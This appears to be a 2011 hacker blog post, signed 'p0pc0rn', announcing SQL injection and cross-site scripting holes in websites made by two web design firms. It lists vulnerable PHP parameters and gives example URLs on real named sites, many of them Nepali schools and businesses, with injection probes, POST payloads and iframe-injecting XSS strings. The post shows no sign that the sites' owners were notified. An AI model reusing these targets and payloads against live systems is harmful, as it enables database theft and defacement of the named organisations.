Saturday, October 22, 2011

Light & Shade Creative Studio web design multiple SQL injections

Title : Light & Shade Creative Studio web design multiple SQL injections
Found : 22 October 2011
Web   : http://www.lnsstudio.com/


[sql]
1 - articles-detail.php?aid=[sql]
2 - notice_detail.php?nid=[sql]
3 - photogallery.php?aid=[sql]
4 - alumni-details.php?batch=[sql]
5 - alumni_students.php?batch=[sql]
6 - more..

Examples :
http://www.fhss.edu.np/articles-detail.php?aid=9'
http://www.shangri-la.edu.np/notice_detail.php?nid=3'
http://www.ops.edu.np/notice_details.php?nid=17'


~/p0pc0rn/~

dreams & ideas web design multiple vulnerabilities

Title : dreams & ideas web design multiple vulnerabilities
Found : 22 October 2011
Web   : http://www.dreamsandideas.com


[sql]
1 - products.php?CatID=[sql]
2 - news_details.php?nid=[sql]
3 - success_story_details.php?sid=[sql]
4 - inside.php?id=[sql]
5 - contact.php?id=[sql]
6 - visaupdate_details.php?vid=[sql]
7 - products.php?BrandID=[sql]
8 - more..

Examples :

http://www.alfabetaedu.com/news_details.php?nid=31'
http://www.neoteric.com.np/products.php?BrandID=2'
http://www.cybersansar.com/article_list.php?pageno=1
POST frdate=2011-10-22&todate=2011-10-22&list_article=-Select-&keyword='&Submit=Submit
http://www.enasha.com/bnb_profile.php?pid=148'


[xss]

1 - search.php
2 - search_result.php?mk=

Examples :
http://www.afn.org.np/search.php
POST keyword=<iframe src=http://www.1337day.com />&search.x=0&search.y=0
http://www.enasha.com/search_result.php?mk=Toyota<iframe src=http://www.1337day.com />



~/p0pc0rn/~

Wednesday, October 12, 2011